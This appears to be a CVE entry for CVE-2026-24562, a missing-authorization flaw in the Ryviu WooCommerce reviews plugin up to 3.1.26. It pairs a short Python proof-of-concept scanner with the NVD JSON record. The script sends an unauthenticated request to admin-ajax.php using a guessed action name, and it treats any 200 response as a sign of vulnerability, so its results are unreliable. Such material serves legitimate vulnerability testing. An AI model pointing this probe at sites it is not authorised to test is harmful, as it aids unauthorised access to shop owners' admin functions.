CVE-2026-24562

import requests import sys ''' CVE-2026-24562 PoC - Ryviu WooCommerce Reviews Broken Access Control Description: Missing Authorization in Ryviu plugin allows unauthorized access to admin functions without authentication. Author: Security Research Note: For authorized security testing only ''' TARGET = "http://target-wordpress-site.com" # Plugin AJAX endpoint (common pattern for Ryviu) AJAX_ENDPOINT = f"{TARGET}/wp-admin/admin-ajax.php" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-24562""" # Test unauthenticated access to Ryviu AJAX functions # Replace 'ryviu_get_reviews' with actual vulnerable function vulnerable_params = { 'action': 'ryviu_get_reviews', 'product_id': '1', # Additional parameters may be required based on specific vulnerability } try: response = requests.post(AJAX_ENDPOINT, data=vulnerable_params, timeout=10) if response.status_code == 200: # Check if response indicates successful unauthorized access # In real scenario, this should return data only for authenticated users print(f"[+] Potential vulnerability detected!") print(f"[+] Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}") return True else: print(f"[-] Request returned status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): if len(sys.argv) > 1: global TARGET TARGET = sys.argv[1] print(f"[*] Testing CVE-2026-24562 on {TARGET}") print("[*] Target: Ryviu - Product Reviews for WooCommerce <= 3.1.26") if check_vulnerability(): print("[!] Target appears to be vulnerable") print("[!] Recommendation: Update Ryviu plugin to latest version") else: print("[*] Target may not be vulnerable or plugin not installed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-24562", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:13.643", "lastModified": "2026-04-28T19:36:50.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ryviu Ryviu – Product Reviews for WooCommerce ryviu allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ryviu – Product Reviews for WooCommerce: from n/a through <= 3.1.26."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ryviu Ryviu – Product Reviews para WooCommerce ryviu permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Ryviu – Product Reviews para WooCommerce: desde n/a hasta &lt;= 3.1.26."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ryviu/vulnerability/wordpress-ryviu-product-reviews-for-woocommerce-plugin-3-1-26-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}